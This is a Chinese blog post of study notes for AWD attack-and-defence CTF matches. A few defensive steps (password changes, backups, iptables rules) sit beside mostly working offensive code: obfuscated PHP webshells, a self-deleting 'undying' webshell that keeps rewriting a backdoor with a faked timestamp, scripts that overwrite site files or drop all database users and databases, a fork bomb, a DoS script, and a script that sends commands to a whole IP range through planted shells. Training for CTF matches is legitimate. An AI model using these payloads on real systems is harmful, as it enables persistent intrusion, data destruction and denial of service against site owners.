AWD学习日记一

已于 2023-11-08 22:12:50 修改
阅读量387 收藏 2
点赞数 16
分类专栏: AWD 文章标签: 网络安全 web安全
于 2023-10-28 15:08:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49064458/article/details/134091171
版权

前言

AWD到时方恨不会,今一年两年没有打线下赛了,脚本也没有了,工具也没有。赶紧跟着大佬复习一波,做一下笔记。
建议:脚本一定要经过测试,要不然上场了一样是不熟悉,用不起来

关于AWD

AWD: Attack With Defence,一般比赛中每个队伍维护几台服务器,分别为web和pwn。web服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。

  • 战队有自己的初始分数;
  • flag在主办方的设定下每隔一定时间,时间一般5-10分钟刷新一轮;
  • 其他队伍提交你的flag,你的队伍扣分,他加分;
  • 动态积分制,每一轮的分数会下降,直到最低(看主办方);
  • 主办方会对每个队伍的网站或服务进行check,服务宕机扣除本轮flag分数;
  • 战队不能攻击主办方
  • 一般分配Web服务器,服务器(多数为Linux)某处存在flag(一般在根目录下);
  • 分配的pwn服务器,服务器多为ubantu,需要本地提权后再用户提权。
  1. 域渗透:也可以叫内网渗透,Windows AD 域环境,更贴近实战
  2. 高地模式:每只队伍服务器可以访问,没有权限,需要自己去获取权限。同时存在高地服务器,不属于任何一支队伍,每只队伍竞争高地服务器权限。

详细参考

Attack With Defence

回忆过去的经验,打AWD比赛有几点需要注意:

  • 准备好一些自己熟悉常用的脚本,最起码是练习时可以使用的
  • 漏洞搜索能力,主办方出题都估计是现有漏洞,有本事0day也可以属于你
  • 快速反应能力与代码编写能力

修改ssh密码

passwd username
# 输入密码确认即可

修改数据库密码及备份数据库

1. 登录 mysql 终端,运行:
mysql> set password=password('new password');
mysql>flush privileges;
2. 修改 mysql user 表
mysql>use mysql;
mysql>update user set password=password('new password') where user='root';
mysql>flush privileges;
3. 使用 GRANT 语句
mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'127.0.0.1' IDENTIFIED BY 'new password' WITH GRANT OPTION;
mysql>flush privileges;
4. mysqladmin
[root@ubuntu]# mysqladmin -u root password "new password";(注意双引号或不加)

数据库恢复,在mysql终端执行

# 命令格式:source FILE_PATH
source ~/db.sql(原数据库需存在)

源码备份

备份!备份!备份!

# 打包目录
tar -zcvf archive_name.tar.gz directory_to_compress
# 解包
tar -zxvf archive_name.tar.gz

查找后门

用D盾扫描备份的文件,查找预留后门,第一时间删除自己靶机上的后门,也可以利用批量脚本后门攻击其他靶机。

端口扫描

使用工具对目标网站进行扫描,目标服务器开放的端口,方便进行漏洞利用。

扫描工具:Namp,御剑等等。

以下是一些服务端口的漏洞:

22:  ssh弱口令
873: 未授权访问漏洞
3306:mysql弱口令
6379:redis未授权访问漏洞

WebShell隐藏与利用

隐藏shell

文件命名形式:
.shell.php
-shell.php

特殊Shell形式

1、连接方式:php?2=assert密码是1。

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

2、配置为?b=))99(rhC(tseuqeR+lave

<?php
$a=chr( 96^5);
$b=chr( 57^79);
$c=chr( 15^110);
$d=chr( 58^86);
$e= '($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>

3、配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
连接密码:0(零)

<?php
$sF= "PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
?>

4、MD5木马

将pass中换成你熟悉的Md5,防止他人利用。

<?php
if(md5($_POST['pass'])=='d8d1a1efe0134e2530f503028a825253')
@eval($_POST['cmd']);
?>

5、MD5木马+利用header

<?php
echo 'hello';
if(md5($_POST['pass'])=='d8d1a1efe0134e2530f503028a825253')
if (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){
$test= 'flag';
header("flag:$test");
}
?>

上传不死马

例子

<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);

$file = 'shell.php';
$code = '<?php if(md5($_POST["passwd"])=="6daf17e539bf44591fad8c81b4a293d7"){@eval($_REQUEST["ZX"]);} ?>';
$passwordHash = "6daf17e539bf44591fad8c81b4a293d7";

while (true) {
    file_put_contents($file, $code);
    system("touch -m -d \"$(date -d '2018-12-01 09:10:12' +'%Y-%m-%d %H:%M:%S')\" $file");
    usleep(5000);
}
?>


#passwd=y0range857
#POST传参:passwd=y0range857&a=system('ls');

将这个文件上传到服务器,然后进行访问,会在该路径下一直生成一个名字为shell2.php的shell文件,用蚁剑连接。

双写入shell

<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);

$file = '.login.php';
$file1 = '/admin/.register.php'; 
$code = '<?php if(md5($_GET["passwd"])=="6daf17e539bf44591fad8c81b4a293d7"){@eval($_REQUEST["ZX"]);} ?>';

while (true) {
    file_put_contents($file, $code);
    system("touch -m -d \"$(date -d '2018-12-01 09:10:12' +'%Y-%m-%d %H:%M:%S')\" $file");

    file_put_contents($file1, $code);
    system("touch -m -d \"$(date -d '2018-12-01 09:10:12' +'%Y-%m-%d %H:%M:%S')\" $file1");

    usleep(5000);
}
?>

浏览器访问at.php,生产不死马at2.php

url/upload/at.php
获取命令
url/upload/at2.php?passwd=obse007&at=system('ls');

alias起别名

将攻击命令用改成别的命令

alias curl="echo nothing"

删除

unalias -a

对方执行cat /flag命令的时候回显就是错误flag

alias cat="echo `date`|md5sum|cut -d ' ' -f1||"

获取 flag 一般是 curl http://xxx.com/flag.txt

alias curl='echo fuckoff' #权限要求较低,可以在这里改成虚假的flag
# 或者
chmod -x curl #权限要求较高
/usr/bin curl路径

扰乱比赛方式(慎用)

无限复制

<?php
  set_time_limit(0);
  ignore_user_abort(true);
  while(1){
      file_put_contents(randstr().'.php',file_get_content(__FILE__));
      file_get_contents("http://127.0.0.1/");
  }
?>

修改数据库密码

update mysql.user set authentication_string=PASSWORD('p4rr0t');# 修改所有用户密码
flush privileges;
UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root'; 
flush privileges;
delete from mysql.user ;#删除所有用户
flush privileges;

重启 apache2 和 nigix

#!/usr/bin/env sh
while [[ 1 ]]
do
    service apache2 stop
    service nginx stop
done &

循环删除

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    unlink(__FILE__);
    function getfiles($path){
        foreach(glob($path) as $afile){
            if(is_dir($afile))
                getfiles($afile.'/*.php');
            else
                @file_put_contents($afile,"#Anything#");
                //unlink($afile);
        }
    }
    while(1){
        getfiles(__DIR__);
        sleep(10);
    }
?>

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    array_map('unlink', glob("some/dir/*.php"));
?>

删除数据库

#!/usr/bin/env python3
import base64

def rm_db(db_user, my_db_passwd):
    cmd = f"/usr/bin/mysql -h localhost -u {db_user} -p{my_db_passwd} -e '"
    db_name = ['performance_schema', 'mysql', 'flag']
    for db in db_name:
        cmd += f"drop database {db};"
    cmd += "'"
    return cmd

# 示例用法
db_user = 'your_username'
my_db_passwd = 'your_password'
command = rm_db(db_user, my_db_passwd)
print(command)

fork_bomb

#!/bin/sh
/bin/echo '.() { .|.& } && .' > /tmp/aaa;/bin/bash /tmp/aaa;

DOS脚本(非必要最好不要用)

import socket
import time
import threading

max_connections = 90000000
port = 80                 # 端口
host = "192.168.92.154"   # IP
page = "/index.php"

attack_payload = (
    f"POST {page} HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Content-Length: 1000000000\r\n"
    "Cookie: 1998\r\n"
    "\r\n"
)

socks = []

def connect():
    global socks
    for _ in range(max_connections):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host, port))
            s.send(attack_payload.encode("utf-8"))
            socks.append(s)
        except Exception as ex:
            time.sleep(1)

def send():
    global socks
    while True:
        for s in socks.copy():
            try:
                # 实际攻击请求的逻辑
                s.send(attack_payload.encode("utf-8"))
                print("攻击中....")
            except Exception as ex:
                socks.remove(s)
                s.close()
        time.sleep(0.1)

if __name__ == "__main__":
    # 使用 threading.Thread 的参数 daemon=True 可以使得主线程退出时子线程也退出
    One = threading.Thread(target=connect, args=(), daemon=True)
    Two = threading.Thread(target=send, args=(), daemon=True)
    One.start()
    Two.start()

    # 等待用户输入任意键终止程序
    input("Press any key to stop the attack...\n")

在加固阶段,每个堡垒机都有一个Web在运行。而这些站点可能存在相应的漏洞和后门。基本上都会有shell留在隐秘的角落…

所以我们就可以通过前期搜寻到的后门,进行操作。这里直接用linux的防火墙进行关闭即可。

在正常情况下:这样的话就直接把系统的后门全杀掉了。只允许22 80 21端口可以进行访问。

首先开启 22 80 21

iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT

然后关闭

iptables -A INPUT -j DROP

在手动一个个连shell搅shi的话,是非常慢的。于是写了个小脚本。

遍历整个IP段,并将防火墙开启全部屏蔽掉~~

import requests

base_url = "http://192.168.182"
port = '80'
shell = "/shell.php"
passwd = "a"

payloads = {
    passwd: "system('iptables -A INPUT -j DROP');"
}

def scan_hosts():
    for i in range(1, 254):
        url = f"{base_url}.{i}:{port}{shell}"
        print(url)
        try:
            res = requests.get(url, params=payloads, timeout=1)
            print(res.text)
        except requests.RequestException as e:
            print(f"Error: {e}")
            # 如果你只是想打印未找到主机的消息,可以注释掉上面的行并取消下面的注释
            # print("未找到主机")

if __name__ == "__main__":
    scan_hosts()
TJ-周月年
关注
  • 16
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
awd总结
Battery的博客
05-04 11万+
对于awd而言简单来说就是分为三步: 1.登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具 扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出)。 2.登录ssh->dump源码->D盾去后门->一人写批量脚本,一个人去修->部署waf,流量监控。 3.控制npc->加固npc(拿到别人的靶机也是一样),紧盯流量。 流程 1.登录比赛平台,查看比赛信息 连接ssh 一般情况下比赛方给的密码都过于
自制AWD工具包.rar
03-05
1. **CSS框架**:AWD工具包可能包含一些预设的CSS框架,如Bootstrap或Foundation,它们提供了基础的样式和布局组件,如栅格系统、按钮、表单等,使得开发者可以快速构建响应式的页面结构。 2. **JavaScript库**:...
linuxawd的详细使用方法,Linux awd
weixin_39913807的博客
05-14 1077
awk也是流式编辑器,针对文档中的行来操作,一行一行地执行。awk兼具sed的所有功能,而且更加强大。实验如下:[root@localhost ~]# mkdir awk[root@localhost ~]# cp /etc/passwd awk/test.txt[root@localhost ~]# cd awk[root@localhost awk]# lstest.txt[root@loca...
linux隐藏webshell后门
weixin_30425949的博客
12-28 263
第一种:本地包含漏洞 你们懂得 不解释修改网站程序代码 - -! 有点淫荡哈第二种:squidclient - -!这个比较淫荡了!方法: //不过需要root权限,对于linux系统权限 呵呵 个人感觉比较容易的//原因很简单,linux管理员技术不够 不然就是 懒!所以悲剧发生了/usr/local/squid/bin/squidclient -m PURGE ' http://127....
红蓝对抗-AWD全流程攻略02(Linux基础)
最新发布
m0_67189356的博客
04-26 795
本文记录了在AWD 攻防对抗中,linux系统常用到的一些命令
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1018
ctf awd知识分享(常用命令,不死马,waf,文件监控)
php web总结,PHP WebShell变形技术总结
weixin_35948624的博客
03-11 181
简介WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为简单的eval($_POST[cmd])的一句话就一定会被查杀。所以目前的变形的本质都在于如何隐藏自己的敏感函数。巧用...
AWD之赛前培训.pptx
02-07
AWD比赛的赛前培训PPT
AWD.rar_AWD
09-24
1. **调试基础知识**:理解调试器的工作原理,学习使用如WinDbg这样的调试工具,熟悉基本的调试命令和操作,如设置断点、查看内存、跟踪执行流程等。 2. **内存诊断**:通过分析内存状态来识别程序崩溃、泄漏或异常...
AWD自动提交flag脚本
05-14
AWD赛事中,参赛者通常需要防护一个网络应用或服务,同时尝试攻击对手的系统来获取他们的flag。编写这样的脚本通常涉及以下关键知识点: 1. **Python编程**:由于Python的易读性、丰富的库支持和广泛应用于自动化...
应急挑战杯大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...应急挑战杯大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
awd和sed思维导图
11-01
学习awd和sed很棒的思维导图,涵盖了很多知识点,可以作快速查阅手册,也可以用来快速学习
awd比赛常用命令行及自动化脚本
Peanuts
10-22 9063
_Author_ = Peanuts 最近是要打第二次awd,总结一下免得自己到时候手忙脚乱
Windows&Linux打CTF/AWD常用命令
1stPeak's Blog
04-10 2916
前言:打CTF/AWD常用Windows/Linux命令 一、Windows常用命令 1、Windows常用快捷键 2、Windows常用命令 二、Linux常用命令
AWD学习总结 (会持续更新)
Jay17的博客
10-18 724
AWD学习总结 (会持续更新)
AWD攻防学习总结(草稿状态,待陆续补充)
燕麦葡萄干的博客
08-09 899
CTF——9款网站目录扫描工具推荐——附下载链接与相关字典:https://blog.csdn.net/weixin_51735061/article/details/124236800。漏洞工具合集:https://github.com/Mr-xn/Penetration_Testing_POC。下载地址:https://gitee.com/duran3000/awd-tools。Web日志安全分析工具v2.0.rar apache日志分析工具。seay扫描速度快,但是扫描深度小且只支持PHP。
ctf线下AWD攻防赛学习笔记
热门推荐
普通Gopher
10-20 1万+
ctf线下AWD攻防赛学习笔记 CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。 在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。 题目类型 语...
AWD比赛笔记
weixin_34417635的博客
12-04 618
一.防御策略 命令注入漏洞 a) 例 str1 = $_POST[‘cmd’],在str1 前连接 字符”#”注释字符,str1 = “#”. $_POST[‘cmd’] b) 上传文件漏洞 a) 注释上传写入代码. b) 文件包含漏洞 a) 修改php.ini文件 allow_url_f...
bugku s1 awd排位赛-12
08-07
bugku s1 awd排位赛-12是Bugku安全平台上举办的一场AWD(Attack and Defense)排位赛的第12轮比赛。Bugku是一个致力于网络安全技术研究和交流的平台,这场比赛的目的是为了检验参赛者在攻击和防御方面的技术实力。 在AWD比赛中,参赛队伍被分为进攻方和防守方。进攻方需要利用各种手段,如漏洞利用、渗透测试等,成功攻击防守方的系统或应用程序,获取旗帜(Flag)作为证明。而防守方则需要尽可能地去发现并修补自己系统或应用程序中的漏洞,以防止被攻击方获取旗帜。 在bugku s1 awd排位赛-12中,参赛者们经过激烈的竞争,展示了他们在网络安全领域的知识和技能。比赛中的题目可能涉及到各种不同的技术,如Web安全、二进制安全、密码学等。参赛者需要运用他们的专业知识和创新思维来解决这些挑战。 AWD比赛不仅仅是一场技术竞赛,更是一个学习和提高的机会。通过参与这类比赛,参赛者可以锻炼自己的技术能力,增强他们对网络安全的理解和认识。此外,比赛还促进了参赛队伍之间的交流和合作,提供了一个分享和学习经验的平台。 总而言之,bugku s1 awd排位赛-12是一个让参赛者在攻击和防御中展示自己技术的平台,并提供了一个促进交流和学习的机会。通过这样的比赛,可以推动网络安全领域的发展,培养更多优秀的安全人才。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值